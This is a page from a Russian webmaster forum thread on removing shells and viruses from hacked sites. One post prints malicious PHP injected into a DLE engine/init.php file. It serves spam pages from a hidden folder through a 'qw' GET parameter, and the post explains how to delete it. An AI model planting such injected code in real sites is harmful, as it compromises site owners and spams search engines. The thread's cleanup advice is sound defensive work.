Форум Сайтостроение Безопасность

Общая тема о борьбе с шеллами и вирусами на сайте

1... 212223242526272829
seosniks
На сайте с 13.08.2007
Offline
389
seosniks
#271

Касаемо DLE

Бывает что взломают сайт и воткнут код в файлик engine/ini.php

если в поисковике видите кучу страниц вида ваш сайт/?qw=тут фигня.

значит надо удалять кусок кода, и искать вирус

Начинается зловред от

$_DOCUMENT_DATE = false;

$user_query = "";

и до строки

$js_array = array ();

все что между ним удаляем.

код 


if(isset( $_GET['q'.'w']) ){

	error_reporting(0);

	$t = str_replace('..','',$_GET['q'.'w']);

	if(strstr($t, ".xml")){

		header('Content-Type: charset=windows-1251');

	}else{

		header('Content-Type: text/html; charset=windows-1251');

	}

	$html = file("/home/***/data/www/ваш сайт/engine/editor/jscripts/tiny_mce/plugins/удалите папку ваш сайт/$t");

	foreach ($html as $key => $value) {

		echo $value;

	}

	die;

}

В результате поисковик индексирует кучу страниц на сайте.

либо выдает агс

Может кому пригодится.

I1
На сайте с 04.12.2010
Offline
33
inventor1975
#272

Есть сервисы которые мониторят файловую структуру сайта. Как только шелл зальют, тут же приходит письмо куда залили. Остается только удалить файл, или кусок кода. Ну и искать дыру, как залили.

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#273
воткнут код в файлик engine/ini.php

учитывая что изначально такого файлика в dle нет, должно насторожить сразу откуда он и что содержит.

P.S. не каждый же догадается, что имелся ввиду

/еngine/init.php
аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
seosniks
На сайте с 13.08.2007
Offline
389
seosniks
#274
kgtu5:
учитывая что изначально такого файлика в dle нет, должно насторожить сразу откуда он и что содержит.

P.S. не каждый же догадается, что имелся ввиду

Прошу прощения букву не дописал.

Имелось ввиду файл init.php

I
На сайте с 31.07.2009
Offline
72
illdisposed
#275

(Есть сервисы которые мониторят файловую структуру сайта ) - адрес сервиса подскажите

I1
На сайте с 04.12.2010
Offline
33
inventor1975
#276

Вот например: find-xss.net/monitoring

vputi
На сайте с 31.03.2006
Offline
167
vputi
#277

где шелл может жить в drupal-e?

Быстро едешь, тихо понесут... www.unitytrans.ru (www.unitytrans.ru)
R
На сайте с 24.01.2008
Offline
180
Алексей
#278
vputi:
где шелл может жить в drupal-e?

В любом месте, нет обязательных мест, где он может находится.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
ebitok
На сайте с 07.11.2011
Offline
112
ebitok
#279

заюзал поиск по вхождению во всех файлах и нашлось вот такое:

Только я не могу понять в каком это файле, линукс не вернул название файла.

что это за фигня такая?

Прошелся Web Shell Detector , он не нашел этот код нигде.

sas7110
На сайте с 22.05.2009
Offline
111
sas7110
#280

Ребят, такой вопрос, на сайте 2ip.ru/site-virus-scaner/ показывает что яндекс видит вирус http://joxi.ru/823jNpMczkZ7mO , а в панели вебмастера вируса нет. Как быть? Раньше в панели вебмастера яндекса было видно, что есть вирус, убирал рекламу, отправлял на перепроверку и вирус уходил... А теперь что делать?

1... 212223242526272829

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий